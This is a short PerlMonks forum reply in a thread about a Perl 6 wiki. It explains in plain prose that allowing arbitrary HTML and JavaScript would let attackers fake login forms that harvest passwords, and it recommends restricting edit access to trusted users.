No such thing as a small change | |
PerlMonks |
Re^5: RFC: self hosting Perl 6 string wikiby moritz (Cardinal) |
on Sep 09, 2008 at 06:59 UTC ( [id://709985]=note: print w/replies, xml ) | Need Help?? |
I think I wasn't very clear on the attack vector I though about, let my try again.
When you have the power of displaying arbitrary html/javascript/css on a page, you can fake everything, including a login form for others to use that actually sends their login/password to your private server. Which basically means that you can get login data without compromising the server in some way. Stealers will eventually pass Parrodocs by because there's nothing worth stealing; If you offer a service that you think is valuable or interesting, the "bad guys" will think the same. For example many people use the same password on different services, so snooping passwords has a value on its own. This is a central issue. Do you think that the following can, at least in theory, work? It can work, but only with the right attitude. When you think of it as a wiki which is rather open, I don't think it can. If you think of it as a CMS where only trusted persons get edit access, you might be more successful.
In Section
Meditations
|
|